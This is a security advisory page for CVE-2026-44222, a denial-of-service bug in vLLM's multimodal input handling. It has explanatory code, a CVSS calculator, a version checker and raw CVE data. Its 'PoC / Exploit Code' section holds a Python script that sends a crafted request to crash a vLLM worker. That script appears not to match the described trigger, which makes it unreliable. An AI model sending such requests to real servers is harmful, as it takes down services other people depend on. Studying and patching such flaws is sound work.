Security Vulnerability Report
CVE-2026-44222 CVSS 6.5 MEDIUM

CVE-2026-44222

Published: 2026-05-12 20:16:43
Last Modified: 2026-05-12 20:16:43

Description

vLLM is an inference and serving engine for large language models (LLMs). Versions from 0.6.1 up to, but not including, 0.20.0 contain a token injection vulnerability in vLLM's multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens. When image or video placeholder sequences are supplied without matching data, vLLM indexes into empty grids during input-position computation, raising an unhandled IndexError that terminates the worker or degrades availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. The vulnerability is fixed in 0.20.0.
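The failure mode described above falls under CWE-129 (improper validation of an array index). The following is a minimal sketch of that bug class and of one possible guard. It is not vLLM's code: the token id `IMAGE_PAD`, the helper names, and the "one grid entry per contiguous run of placeholder tokens" rule are all assumptions made for illustration.

```python
from typing import List, Sequence, Tuple

# Hypothetical placeholder token id; not a real vocabulary value.
IMAGE_PAD = 9001

Grid = Tuple[int, int, int]  # (t, h, w), mirroring the shape of an image_grid_thw row


def count_placeholder_runs(token_ids: Sequence[int], placeholder_id: int) -> int:
    """Count contiguous runs of the placeholder token (assumed: one run per image)."""
    runs = 0
    prev_is_placeholder = False
    for tok in token_ids:
        is_placeholder = tok == placeholder_id
        if is_placeholder and not prev_is_placeholder:
            runs += 1
        prev_is_placeholder = is_placeholder
    return runs


def unchecked_lookup(token_ids: Sequence[int], grids: Sequence[Grid]) -> List[Grid]:
    """Bug class: one grid lookup per placeholder run, with no bounds check."""
    return [grids[i] for i in range(count_placeholder_runs(token_ids, IMAGE_PAD))]


def checked_lookup(token_ids: Sequence[int], grids: Sequence[Grid]) -> List[Grid]:
    """Guarded variant: reject the request when placeholders and grids disagree."""
    runs = count_placeholder_runs(token_ids, IMAGE_PAD)
    if runs != len(grids):
        raise ValueError(
            f"prompt has {runs} placeholder run(s) but {len(grids)} grid entries"
        )
    return [grids[i] for i in range(runs)]


# A text-only prompt that spells placeholder tokens, with no image data attached.
text_only_prompt = [1, 2, IMAGE_PAD, IMAGE_PAD, 3]

try:
    unchecked_lookup(text_only_prompt, [])
except IndexError as exc:
    print(f"unchecked path crashed: {exc!r}")

try:
    checked_lookup(text_only_prompt, [])
except ValueError as exc:
    print(f"checked path rejected the request: {exc}")
```

In a server, the point of the guarded variant is that a `ValueError` raised during request validation can be turned into a client error response, whereas an unhandled `IndexError` deeper in the pipeline can take down the worker.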

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
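To show how the 6.5 base score follows from the vector, here is a small sketch of the CVSS v3.1 base-score arithmetic. The metric weights and the `roundup` rule are taken from the CVSS v3.1 specification; the function names are illustrative, and only the scope-unchanged case (S:U) that this vector uses is handled.

```python
import math

# Metric weights from the CVSS v3.1 specification (PR values are for scope unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str):
    """Return (base, exploitability, impact) for a scope-unchanged CVSS v3.1 vector."""
    # Skip the leading "CVSS:3.1" prefix and split the rest into metric/value pairs.
    parts = dict(item.split(":") for item in vector.split("/")[1:])
    if parts["S"] != "U":
        raise NotImplementedError("this sketch only covers scope unchanged (S:U)")

    w = {name: WEIGHTS[name][parts[name]] for name in WEIGHTS}
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss

    base = 0.0 if impact <= 0 else roundup(min(impact + exploitability, 10))
    return base, exploitability, impact


base, exploitability, impact = base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H")
print(base, round(exploitability, 1), round(impact, 1))
```

For this vector the sketch yields a base score of 6.5, with exploitability and impact sub-scores that round to 2.8 and 3.6, matching the values in the raw record. The score is driven entirely by availability (A:H); confidentiality and integrity contribute nothing.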

Configurations (Affected Products)

No configuration data available.

vLLM 0.6.1 up to, but not including, 0.20.0
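A quick way to triage a deployment is to compare its vLLM version against the affected range. The sketch below does this with plain tuple comparison on the numeric release components. The helper names are hypothetical, and treating suffixes such as `.post1` or `rc1` as equal to their base release is a simplifying assumption, not a statement about which pre-release builds contain the fix.

```python
import re
from importlib import metadata
from typing import Optional, Tuple

FIRST_AFFECTED = (0, 6, 1)   # lower bound, inclusive (from the advisory)
FIRST_FIXED = (0, 20, 0)     # upper bound, exclusive (from the advisory)


def parse_release(version: str) -> Tuple[int, ...]:
    """Extract the leading numeric components, e.g. '0.6.1.post1' -> (0, 6, 1)."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = tuple(int(p) for p in match.group(0).split("."))
    # Pad short versions such as '0.19' to three components.
    return parts + (0,) * (3 - len(parts))


def is_affected(version: str) -> bool:
    """True when the version falls in the range 0.6.1 <= v < 0.20.0."""
    return FIRST_AFFECTED <= parse_release(version) < FIRST_FIXED


def installed_vllm_affected() -> Optional[bool]:
    """Check the locally installed vllm package; None when it is not installed."""
    try:
        return is_affected(metadata.version("vllm"))
    except metadata.PackageNotFoundError:
        return None


for candidate in ("0.6.0", "0.6.1", "0.19.1", "0.20.0"):
    print(candidate, "affected" if is_affected(candidate) else "not affected")
```

Calling `installed_vllm_affected()` inside the environment that runs the server reports on the installed package rather than on a hard-coded string.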

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# Target URL (Example)
url = "http://target-vllm-instance:8000/v1/chat/completions"

# Malicious payload containing an image placeholder without actual image data
# This attempts to trigger the IndexError in the multimodal processing path
payload = {
    "model": "meta-llama/Llama-2-7b-chat-hf",
    "messages": [
        {
            "role": "user",
            "content": [
                {"type": "text", "text": "Analyze this image:"},
                # Sending an image type with empty/missing data to trigger the bug
                {"type": "image_url", "image_url": {"url": "data:image/jpeg;base64,"}}
            ]
        }
    ],
    "max_tokens": 50
}

try:
    response = requests.post(url, headers={"Content-Type": "application/json"}, data=json.dumps(payload))
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Request failed: {e}")

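References

https://github.com/vllm-project/vllm/issues/32656
https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f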

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44222", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.160", "lastModified": "2026-05-12T20:16:43.160", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-129"}]}], "references": [{"url": "https://github.com/vllm-project/vllm/issues/32656", "source": "[email protected]"}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f", "source": "[email protected]"}]}}